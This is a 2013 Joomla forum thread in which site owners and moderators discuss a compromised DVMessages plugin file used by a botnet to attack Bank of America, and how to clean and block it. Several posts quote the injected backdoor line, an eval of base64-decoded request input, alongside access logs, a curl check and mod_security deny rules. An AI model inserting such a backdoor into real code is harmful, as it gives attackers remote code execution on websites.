The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 19 posts ] 
Author Message
PostPosted: Wed Feb 20, 2013 10:15 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sun Jan 20, 2013 2:45 pm
Posts: 4
Is dvmessages.php a valid joomla file? My host is claiming abuse notices from Bank of America and we have double checked everything and have not found any updated files...

We did notice that the joomla error logs are not being populate as of recently...not sure how to get that going again but the path in site config seems find

We did find a few of the following in the raw logs...

184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"

We currently using Akeeba admin to turn off site temporarily

so if you can tell us how to get loggin back on and what else i should check...

thanks


Top
 Profile  
 
PostPosted: Sat Feb 23, 2013 11:18 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sat Feb 23, 2013 9:47 am
Posts: 4
I have sort of the same question. The server that we have contract with, send us an email.
It claims that 'dvmessages.php' in 'plugins/system/dvmessages.php' path is a malware. Do you have any experience about this?
I 'm looking forward to your answers.
Regards,


Top
 Profile  
 
PostPosted: Sat Feb 23, 2013 12:17 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12474
Location: The Girly Side of Joomla in Sussex
is this an extension plugin for http://extensions.joomla.org/extensions ... ames/10999
what are the contents of the file

as for your logging issues, try and delete the current log file and see if that will restart it. check the logging settings with your host

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Tue Feb 26, 2013 2:19 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Aug 24, 2005 5:31 pm
Posts: 37
Location: Sweden
this is second time I get notice from
Abuse Team
Bank of America
The code of the file is:
Code:
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
jimport( 'joomla.application.component.helper' );
class plgSystemDVMessages extends JPlugin
{
   var $message;

   function plgSystemDVMessages(& $subject, $config) {
      parent::__construct($subject, $config);
   }
   
   function onAfterInitialise()
   {
      global $_PROFILER, $mainframe, $database, $_SESSION;
      $plugin         =& JPluginHelper::getPlugin('system', 'dvmessages');
      $pluginParams   = new JParameter( $plugin->params );

      $document = &JFactory::getDocument();
      $temps = $mainframe->getMessageQueue();
      if ($temps) {
         foreach($temps as $temp) {
            if ($temp['message'] != '') {
               $messages = $temp;
            }
         }
      }

      if ($messages) {
         if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
         !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
            $type = '';
            if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
               $type = 'info';
            } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
               $type = 'alert';
            } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
               $type = 'error';
            } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
               $type = 'info';
            }
            
            if ($type != '') {
               JHTML::_('behavior.mootools');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
               $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
               
               $document->addScriptDeclaration("
                  jQuery.noConflict();         
                  jQuery(document).ready(function(){
                     Sexy.$type('".addslashes($messages['message'])."');
                  });
               ");
               
               if ($pluginParams->get('hide_css', 1)) {
                  $document->addScriptDeclaration("
                     jQuery.noConflict();
                     jQuery(document).ready(function(){
                        document.getElementById('system-message').style.display = 'none';
                     });
                  ");
               }
            }
         }
      }
      return true;
   }
}


The abuse team advice me to check with:
curl -A "Mozilla/4.0" -iL [URL]
I get
Code:
[root@srv5 dvmessages]# curl -A "Mozilla/4.0" -iL http://www.xxx/plugins/system/dvmessages/dvmessages.php
HTTP/1.1 200 OK
Date: Tue, 26 Feb 2013 14:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.20
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html


Any advice?

_________________
Pera
http://winstart.com


Top
 Profile  
 
PostPosted: Tue Feb 26, 2013 6:45 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Tue Feb 26, 2013 6:37 pm
Posts: 1
Location: London, UK
Hello,

Oh so I`m not the only one having this problem then :-[

I got a message today from my host stating there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. Can not recall installing mentioned extension. Is it possible it came with anything else?

Now when I`m checking plugins folder there is no sign of dvmessages. How weird?


Top
 Profile  
 
PostPosted: Tue Feb 26, 2013 8:37 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Thu May 27, 2010 1:00 pm
Posts: 1106
@pera the first line
Code:
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
for sure doesn't look nice.

_________________
-- Ionut
http://www.medialup.com


Top
 Profile  
 
PostPosted: Tue Feb 26, 2013 10:38 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Tue Feb 26, 2013 10:25 pm
Posts: 1
My hosting provider just sent me a similar warning, is a cyber attack? , I see nothing strange in the code ... Please anyone can tell me where is the attack?


Top
 Profile  
 
PostPosted: Wed Feb 27, 2013 3:39 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Aug 24, 2005 5:31 pm
Posts: 37
Location: Sweden
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
Code:
<?php
/**

*/

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );


But on the "infected" dvmessages.php
Code:
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );


This old plugin for Joomla 1.5... best is to not use it or?

_________________
Pera
http://winstart.com


Top
 Profile  
 
PostPosted: Wed Feb 27, 2013 6:53 pm 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2727
Location: Wisconsin USA
Well obviously (based on posted code) the code is now part of a larger hack with likely more files installed somewhere on the site.

My advice is to disable, and completely remove all traces of the plugin and also your (everyone jumping on with a me too) going to have to follow the advice and procedures here: viewtopic.php?f=621&t=582854 in order to properly remove the hack, clean the site(s).

I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the sites insecurity, but until you know for sure don't use it.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


Top
 Profile  
 
PostPosted: Fri Mar 08, 2013 3:25 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Mar 08, 2013 2:43 am
Posts: 1
This is definitely part of a larger effort. This is a very dangerous hack that is much, much larger than Bank of America and all administrators should remove this plugin and follow the instructions from PhilD above. Additionally, if you administrate your own server (i.e. a VPS, dedicated server), then you should also secure your temp directory (and also your Joomla temp directory, if different from your system temp). Below is an example on how you might be able to do that.

http://www.techrepublic.com/blog/openso ... -linux/171


Top
 Profile  
 
PostPosted: Thu Mar 21, 2013 12:29 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Thu Mar 21, 2013 12:27 pm
Posts: 1
your server is now part of a botnet if you have this file (or others)

http://www.prolexic .com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html

itsokbronoproblem botnet uses these files ...

If you have these files on your Joomla (or wordpress) then your installation has been comprimised by the automated attack tools the botnet uses,, this would mean you have old versions of Joomla or wordpress installed.

You need to update Joomla / Wordpress to the most recent versions, remove any components / plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes / comprimised back doors.


Top
 Profile  
 
PostPosted: Fri Mar 22, 2013 9:21 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu May 20, 2010 12:52 am
Posts: 10
This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code:
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );


The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).


Top
 Profile  
 
PostPosted: Thu Mar 28, 2013 5:05 pm 
Joomla! Intern
Joomla! Intern

Joined: Fri Jul 20, 2007 2:57 pm
Posts: 79
Location: Pattaya & Surin/Thailand
skate323k137 wrote:
This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code:
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );


The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).



So, we're all in the same boat ... Three of my sites have been attacked and my host company sent me several complaints from Bank of America. Also on my sites plugins/system/dvsmessages.php was mentioned every time. I have now changed the parameters of all three files, but I don't think this will change much. My joomla install is marked as updated, except on one site where I have to update manually.

Sorry to ask: "Upgrade your software" >> which software, please?

This is what my dvmessages,php file contains now:

params ); $document = &JFactory::getDocument(); $temps = $mainframe->getMessageQueue(); if ($temps) { foreach($temps as $temp) { if ($temp['message'] != '') { $messages = $temp; } } } if ($messages) { if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) || !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) { $type = ''; if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) { $type = 'info'; } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) { $type = 'alert'; } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) { $type = 'error'; } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) { $type = 'info'; } if ($type != '') { JHTML::_('behavior.mootools'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js'); $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css'); $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ Sexy.$type('".addslashes($messages['message'])."'); }); "); if ($pluginParams->get('hide_css', 1)) { $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ document.getElementById('system-message').style.display = 'none'; }); "); } } } } return true; } }


Last edited by Sampao on Thu Mar 28, 2013 5:24 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Thu Mar 28, 2013 5:20 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu May 20, 2010 12:52 am
Posts: 10
The only one of these I tracked down in domlogs tracked to com_installer. That should have been patched a long time ago. Are you in a shared hosting environment like on a cPanel server with other customers? If so you should ask your host if they've applied a patch to prevent cross-account symbolic links.

If you have root access you should install configserver firewall and mod_security. Configserver firewall will block IP's that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days causing high server load. Put this in modsec2.user.conf or one of your first includes files referenced in that file:

Code:
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "chain,id:1234942,msg:dvmessages"
SecRule SERVER_NAME "domain.com"


Change domain.com to the site being attacked. If it affects several sites just make it a one-line rule:

Code:
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "id:1234943,msg:dvmessages"


Top
 Profile  
 
PostPosted: Thu Mar 28, 2013 5:49 pm 
Joomla! Intern
Joomla! Intern

Joined: Fri Jul 20, 2007 2:57 pm
Posts: 79
Location: Pattaya & Surin/Thailand
to skate323k137:

was that last message for me? If yes, I can't follow your instructions, honestly.


Top
 Profile  
 
PostPosted: Thu Mar 28, 2013 6:36 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu May 20, 2010 12:52 am
Posts: 10
It was, though it will help anyone in this situation if they are on a linux server. Are you hosted on a shared server, or do you have root access to your hosting environment (i.e. VPS or Dedicated server?)


Top
 Profile  
 
PostPosted: Mon Apr 01, 2013 7:07 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Apr 01, 2013 7:03 am
Posts: 2
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
what does smh mean


Top
 Profile  
 
PostPosted: Fri Apr 26, 2013 7:11 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Jul 07, 2011 11:58 am
Posts: 30
Location: South Africa
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks


Top
 Profile  
 
PostPosted: Thu May 09, 2013 5:11 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Sun Sep 25, 2005 5:29 am
Posts: 1410
Location: Porto - Portugal
PseudZ wrote:
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks

The extension reported here is
DVMessages - http://archive.extensions.joomla.org/ex ... ames/10999

_________________
Tutorials: Online translation for Joomla core and extensions: https://sites.google.com/site/transjoomla
- Portuguese Joomla Community / Joomla pt-PT Translation Team


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 19 posts ] 



Who is online

Users browsing this forum: No registered users and 15 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group